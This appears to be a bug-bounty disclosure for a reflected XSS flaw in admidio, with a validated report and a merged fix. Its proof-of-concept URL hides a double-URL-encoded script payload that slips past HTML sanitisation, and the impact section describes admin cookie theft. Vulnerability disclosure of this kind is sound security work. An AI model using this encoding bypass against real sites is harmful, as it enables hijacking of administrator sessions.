Cross-site Scripting (XSS) - Reflected in admidio/admidio

Valid

Reported on

Oct 18th 2021


Description

Possible to perform reflected XSS by using double URL encoding when retrieving files

Proof of Concept

Trigger XSS via

http://10.0.2.15/admidio/adm_program/modules/documents-files/documents_files_function.php?mode=6&folder_id=1&name=%253c%2573%2563%2572%2569%2570%2574%253e%2561%256c%2565%2572%2574%2528%2531%2529%253c%252f%2573%2563%2572%2569%2570%2574%253e

Impact

Possible trick admin users to visit the malicious link, executing the XSS and allowing cookies to be stolen, it is also possible to execute actions as admin user via malicious Javascript.

Occurences

html sanitisation should be done after all input has been transformed

We have contacted a member of the admidio team and are waiting to hear back a month ago
We have contacted a member of the admidio team and are waiting to hear back a month ago
haxatron modified their report
a month ago
Markus Faßbender validated this vulnerability a month ago
haxatron has been awarded the disclosure bounty
The fix bounty is now up for grabs
Markus Faßbender confirmed that a fix has been merged on 01a83d a month ago
Markus Faßbender has been awarded the fix bounty